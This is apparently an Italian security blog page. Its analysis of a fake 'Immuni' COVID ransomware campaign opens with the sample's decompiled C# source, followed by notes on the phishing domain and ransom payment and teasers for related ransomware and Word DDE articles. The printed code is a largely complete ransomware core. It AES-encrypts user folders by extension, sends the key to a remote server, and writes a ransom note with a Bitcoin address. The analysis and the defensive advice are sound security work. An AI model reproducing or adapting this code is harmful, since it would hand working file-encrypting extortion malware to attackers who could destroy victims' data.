[DllImport("user32.dll", CharSet = CharSet.Auto)] private static extern int SystemParametersInfo( uint action, uint uParam, string vParam, uint winIni); public Form1() { this.InitializeComponent(); } private void Form1_Load(object sender, EventArgs e) { this.Opacity = 100.0; this.ShowInTaskbar = false; this.startAction(); } protected override CreateParams CreateParams { get { CreateParams createParams = base.CreateParams; createParams.ExStyle |= 128; return createParams; } } private void Form_Shown(object sender, EventArgs e) { this.Visible = true; this.Opacity = 100.0; } public byte[] AES_Encrypt(byte[] bytesToBeEncrypted, byte[] passwordBytes) { byte[] salt = new byte[8] { (byte) 1, (byte) 2, (byte) 3, (byte) 4, (byte) 5, (byte) 6, (byte) 7, (byte) 8 }; using (MemoryStream memoryStream = new MemoryStream()) { using (RijndaelManaged rijndaelManaged = new RijndaelManaged()) { rijndaelManaged.KeySize = 256; rijndaelManaged.BlockSize = 128; Rfc2898DeriveBytes rfc2898DeriveBytes = new Rfc2898DeriveBytes(passwordBytes, salt, 1000); rijndaelManaged.Key = rfc2898DeriveBytes.GetBytes(rijndaelManaged.KeySize / 8); rijndaelManaged.IV = rfc2898DeriveBytes.GetBytes(rijndaelManaged.BlockSize / 8); rijndaelManaged.Mode = CipherMode.CBC; using (CryptoStream cryptoStream = new CryptoStream((Stream) memoryStream, rijndaelManaged.CreateEncryptor(), CryptoStreamMode.Write)) { cryptoStream.Write(bytesToBeEncrypted, 0, bytesToBeEncrypted.Length); cryptoStream.Close(); } return memoryStream.ToArray(); } } } public string CreatePassword(int length) { StringBuilder stringBuilder = new StringBuilder(); Random random = new Random(); while (0 < length--) stringBuilder.Append("abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890*!=?()"[random.Next("abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890*!=?()".Length)]); return stringBuilder.ToString(); } public void SendPassword(string password) { try { new WebClient().DownloadString(this.targetURL + ("?computer_name=" + this.computerName + "&userName=" + this.userName + "&password=" + password + "&allow=ransom")); } catch (Exception ex) { } } public void EncryptFile(string file, string password) { byte[] bytes = this.AES_Encrypt(System.IO.File.ReadAllBytes(file), SHA256.Create().ComputeHash(Encoding.UTF8.GetBytes(password))); string path = this.userDir + ("Users\\" + this.userName + "\\Desktop\\READ_IT.txt.fuckunicornhtrhrtjrjy"); if (System.IO.File.Exists(path)) System.IO.File.Delete(path); System.IO.File.WriteAllBytes(file, bytes); System.IO.File.Move(file, file + ".fuckunicornhtrhrtjrjy"); } public void encryptDirectory(string location, string password) { try { string[] strArray = new string[68] { ".txt", ".jar", ".exe", ".dat", ".contact", ".settings", ".doc", ".docx", ".xls", ".xlsx", ".ppt", ".pptx", ".odt", ".jpg", ".png", ".csv", ".py", ".sql", ".mdb", ".sln", ".php", ".asp", ".aspx", ".html", ".htm", ".xml", ".psd", ".pdf", ".dll", ".c", ".cs", ".mp3", ".mp4", ".f3d", ".dwg", ".cpp", ".zip", ".rar", ".mov", ".rtf", ".bmp", ".mkv", ".avi", ".apk", ".lnk", ".iso", ".7-zip", ".ace", ".arj", ".bz2", ".cab", ".gzip", ".lzh", ".tar", ".uue", ".xz", ".z", ".001", ".mpeg", ".mp3", ".mpg", ".core", ".crproj", ".pdb", ".ico", ".pas", ".db", ".torrent" }; string[] files = Directory.GetFiles(location); string[] directories = Directory.GetDirectories(location); for (int index = 0; index < files.Length; ++index) { string extension = Path.GetExtension(files[index]); if (((IEnumerable<string>) strArray).Contains<string>(extension)) this.EncryptFile(files[index], password); } for (int index = 0; index < directories.Length; ++index) this.encryptDirectory(directories[index], password); } catch (Exception ex) { } } public void MoveVirus() { string path = this.userDir + this.userName + "\\Rand123"; string str = this.userDir + this.userName + "\\Rand123\\local.exe"; if (!Directory.Exists(path)) Directory.CreateDirectory(path); else if (System.IO.File.Exists(str)) System.IO.File.Delete(str); System.IO.File.Move(Directory.GetCurrentDirectory() + ("\\" + Process.GetCurrentProcess().ProcessName + ".exe"), str); } public static bool CheckForInternetConnection() { try { using (WebClient webClient = new WebClient()) { using (webClient.OpenRead("https://www.google.com")) return true; } } catch { return false; } } public void startAction() { this.MoveVirus(); string password = this.CreatePassword(15); this.Directory_Settings_Sending(password); this.messageCreator(); string path = this.userDir + this.userName + "\\ransom.jpg"; bool flag; do { flag = Form1.CheckForInternetConnection(); if (flag) { this.SetWallpaperFromWeb(this.backgroundImageUrl, path); this.SendPassword(password); } } while (!flag); } public void Directory_Settings_Sending(string password) { string str = "Users\\"; string location1 = this.userDir + str + this.userName + "\\Desktop"; string location2 = this.userDir + str + this.userName + "\\Links"; string location3 = this.userDir + str + this.userName + "\\Contacts"; string location4 = this.userDir + str + this.userName + "\\Desktop"; string location5 = this.userDir + str + this.userName + "\\Documents"; string location6 = this.userDir + str + this.userName + "\\Downloads"; string location7 = this.userDir + str + this.userName + "\\Pictures"; string location8 = this.userDir + str + this.userName + "\\Music"; string location9 = this.userDir + str + this.userName + "\\OneDrive"; string location10 = this.userDir + str + this.userName + "\\Saved Games"; string location11 = this.userDir + str + this.userName + "\\Favorites"; string location12 = this.userDir + str + this.userName + "\\Searches"; string location13 = this.userDir + str + this.userName + "\\Videos"; this.encryptDirectory(location1, password); this.encryptDirectory(location2, password); this.encryptDirectory(location3, password); this.encryptDirectory(location4, password); this.encryptDirectory(location5, password); this.encryptDirectory(location6, password); this.encryptDirectory(location7, password); this.encryptDirectory(location8, password); this.encryptDirectory(location9, password); this.encryptDirectory(location10, password); this.encryptDirectory(location11, password); this.encryptDirectory(location12, password); this.encryptDirectory(location13, password); } public void messageCreator() { string path = this.userDir + "Users\\" + this.userName + "\\Desktop\\READ_IT.txt"; string str = this.computerName + "-" + this.userName; string[] contents = new string[8] { "La lunga serpe sul bastone di Asceplio si è ribellata, ed una nuova era sta per sopraggiungere!", "Questa è la vostra possibilità per redimervi dopo anni di peccati e soprusi.", "Sta a voi scegliere. Entro 3 giorni il pegno pagare dovrai o il fuoco di Prometeo cancellerà", "i vostri dati così come ha cancellato il potere degli Dei sugli uomini. Il pegno è di solamente 300 euros, da pagare", "con i Bitcoin al seguente indirizzo : 195naAM74WpLtGHsKp9azSsXWmBCaDscxJ dopo che pagato avrai, ", "una email mandarci dovrai. [email protected] il codice di transazione sarà la prova.", "Dopo il pegno pagato riceverai la soluzione per spegnere il fuoco di Prometeo. Andare dalla ", "polizia o chiamare tecnici a niente servirà, nessun essere umano aiutarti potrà." }; System.IO.File.WriteAllLines(path, contents); } public void SetWallpaper(string path) { Form1.SystemParametersInfo(20U, 0U, path, 3U); } private void SetWallpaperFromWeb(string url, string path) { try { new WebClient().DownloadFile(new Uri(url), path); this.SetWallpaper(path); } catch (Exception ex) { } } private void pictureBox1_Click(object sender, EventArgs e) { } private void button1_Click(object sender, EventArgs e) { this.Close(); } protected override void Dispose(bool disposing) { if (disposing && this.components != null) this.components.Dispose(); base.Dispose(disposing); } private void InitializeComponent() { ComponentResourceManager componentResourceManager = new ComponentResourceManager(typeof (Form1)); this.pictureBox1 = new PictureBox(); this.button1 = new Button(); ((ISupportInitialize) this.pictureBox1).BeginInit(); this.SuspendLayout(); this.pictureBox1.BackgroundImage = (Image) componentResourceManager.GetObject("pictureBox1.BackgroundImage"); this.pictureBox1.Location = new Point(-2, -6); this.pictureBox1.Name = "pictureBox1"; this.pictureBox1.Size = new Size(1074, 691); this.pictureBox1.SizeMode = PictureBoxSizeMode.Zoom; this.pictureBox1.TabIndex = 0; this.pictureBox1.TabStop = false; this.pictureBox1.Click += new EventHandler(this.pictureBox1_Click); this.button1.Location = new Point(1023, 12); this.button1.Name = "button1"; this.button1.Size = new Size(29, 23); this.button1.TabIndex = 1; this.button1.Text = "X"; this.button1.UseVisualStyleBackColor = true; this.button1.Click += new EventHandler(this.button1_Click); this.AutoScaleDimensions = new SizeF(6f, 13f); this.AutoScaleMode = AutoScaleMode.Font; this.ClientSize = new Size(1064, 681); this.Controls.Add((Control) this.button1); this.Controls.Add((Control) this.pictureBox1); this.FormBorderStyle = FormBorderStyle.None; this.Icon = (Icon) componentResourceManager.GetObject("$this.Icon"); this.Name = nameof (Form1); this.Text = "Coronavirus"; this.UseWaitCursor = true; this.Load += new EventHandler(this.Form1_Load); ((ISupportInitialize) this.pictureBox1).EndInit(); this.ResumeLayout(false); }
}
}

L'analisi mostra anche un dettaglio molto importante, aumentando le ipotesi di un virus scritto da criminali italiani per vittime italiane. Il nome del creatore potrebbe essere proprio Leonardo.

Virus IMMUNI: l'origine del file infetto

L'email inviata dai criminali invita l'utente a scaricare il file infetto dal sito www.fofl.it che non è altro che la copia identica del sito ufficiale dell'FEDERAZIONE ORDINI FARMACISTI ITALIANI effettuata in data 3 maggio 2020.

L'interrogazione WHOIS del dominio FOFL.IT mostra alcune informazioni aggiuntive, come il nome del registrante, chiaramente fasullo.

Dominio registrato da NICOLAI DOMBROWSKY

Al momento della pubblicazione di questo contenuto il sito è già stato reso irraggiungibile dal servizio di hosting.

Virus IMMUNI: pagare il riscatto?

Verificando l'indirizzo su cui viene richiesto il pagamento del riscatto, al momento non risulta alcun pagamento andato a buon fine. Il nostro consiglio è di non effettuare in nessun modo questa operazione.

Virus IMMUNI: principianti allo sbaraglio?

Sono molti i fattori che possono indicare che l'origine di questo virus che cripta i file siano criminali alle prime armi, con scarse conoscenze tecniche, ma allo stesso tempo nessun timore nel diffondere una minaccia che potrebbe avere un grosso impatti a livello sociale.

Il codice del virus sembra essere un copia-incolla di altri ransomware già visti in precedenza. La diffusione è stata scarsa e il dominio truffaldino, ospitato da server tedeschi, è stato subito posto in sospensione.

Dolcis in fundo, l'email dei criminali (o forse criminale, Leonardo sei stato tu? ) indicata nella nota di riscatto.. è sbagliata! Questo impedirebbe un ipotetico contatto con la vittima, azzerando quindi la possibilità di comunicare una buona riuscita del pagamento e di conseguenza non offrendo la soluzione al blocco dei file.

Leggi di più...

Ransomware: tecniche di attacco e contromisure

Il rapido sviluppo tecnologico di questi anni ha comportato un proporzionale aumento degli attacchi informatici. I crimini informatici sono diventati più complessi e possono portare a compromettere contemporaneamente migliaia o addirittura milioni di dispositivi.

Oggi esistono vari tipi di vettori del cyber-crimine e uno dei più recenti e temuti è il ransomware, un tipo di estorsione digitale o ricatto digitale di cui abbiamo già trattato in passato.

Il ransomware è un tipo di malware che impedisce agli utenti di accedere alle risorse del proprio dispositivo informatico e / o ai dati personali memorizzati al loro interno utilizzando vari metodi. Il ransomware non intende arrecare danni al file system del computer, ma permette le funzioni di base per fornire alla vittima un modo per pagare il riscatto e visualizzare le istruzioni di pagamento.

(altro…)
Leggi di più...

Come può un ransomware bypassare i controlli di sicurezza?

Come può un ransomware bypassare i controlli di sicurezza?

Gli attacchi ransomware sono stati a lungo una minaccia per gli utenti di Internet, in particolare per il settore delle imprese. In assenza dell'implementazione di adeguate pratiche di sicurezza, molte aziende e organizzazioni diventano spesso vittime di questo tipo di attacchi. Di recente, uno studio ha evidenziato come la maggior parte dei virus ransomware possa bypassare i controlli di sicurezza.

Le tecniche ransomware più comuni

I ricercatori di SophosLabs hanno recentemente pubblicato un dettagliato whitepaper che evidenzia come la maggior parte dei ransomware eluda le misure di sicurezza. Sono state analizzate numerose varianti di ransomware famigerate per i loro attacchi devastanti e sono state trovate numerose tecniche che agevolano il ransomware nella sua azione. 

(altro…)
Leggi di più...

Documenti Word con un Virus non rilevabile dagli Antivirus: NESSUNO E’ AL SICURO

Un virus nei file di Word senza macro? Ebbene sì, un recente virus si sta diffondendo rapidamente e chiunque utilizzi i file .doc è una potenziale vittima. Ultimamente abbiamo notato che molte delle vittime che ci contattano hanno un elemento in comune: sono state infettate da un virus semplicemente aprendo un documento Microsoft Word apparentemente innocuo.

Microsoft Word è vulnerabile

Come funziona questo nuovo tipo di attacco? Viene costruito un file .doc che contiene un codice particolare, chiamato Microsoft Dynamic Data Exchange (DDE) che permette, senza utilizzare codice Macro o Active-x, di eseguire dei comandi sul dispositivo dell'utente ignaro del pericolo. Come puoi proteggerti? Fortunatamente all'apertura del file Word vieni avvisato che c'è qualcosa di strano nel documento ed appare questa schermata: word_virus Mi raccomando: se ricevi un documento via Mail ed all'apertura ti appare questa schermata premi sul pulsante No e chiudi immediatamente il file per evitare che il tuo computer venga infettato dal virus. Se viene premuto il tasto Sì viene avviato il codice del virus che obbliga il computer a scaricare un malware da un sito esterno.  Questo è il codice che potenzialmente potrebbe essere eseguito:

virus_word_codice

Microsoft ovviamente non si assume nessuna responsabilità sui pericoli di questa funzionalità, in quanto l'utente viene avvisato dell'apertura della sorgente esterna. Anzi, la descrivono come una "funzionalità molto utile". In modo analogo, gli antivirus non rilevano questo collegamento come un'attività illecita. Fortunatamente alcuni riescono a rilevare il malware che viene scaricato e a bloccarlo con successo.

I consigli di Dottor Marc

 per la sicurezza e la salute dei tuoi dati

Tutti noi, dall'azienda al libero professionista al privato, non possiamo essere vittime così facile dei virus che criptano i file. Questi virus e ransomware hanno avuto una diffusione così rapida soprattutto grazie alla negligenza nella gestione dei dati. Sperare di recuperare i file criptati dai virus dovrebbe essere una soluzione da non prendere neanche in considerazione, pari al pagamento del riscatto. Ti consigliamo di prestare particolare attenzione a questi punti per evitare di essere vittima di questi virus, con pochi e semplici accorgimenti. Ricordati che prevenire è meglio che formattare.
Leggi di più...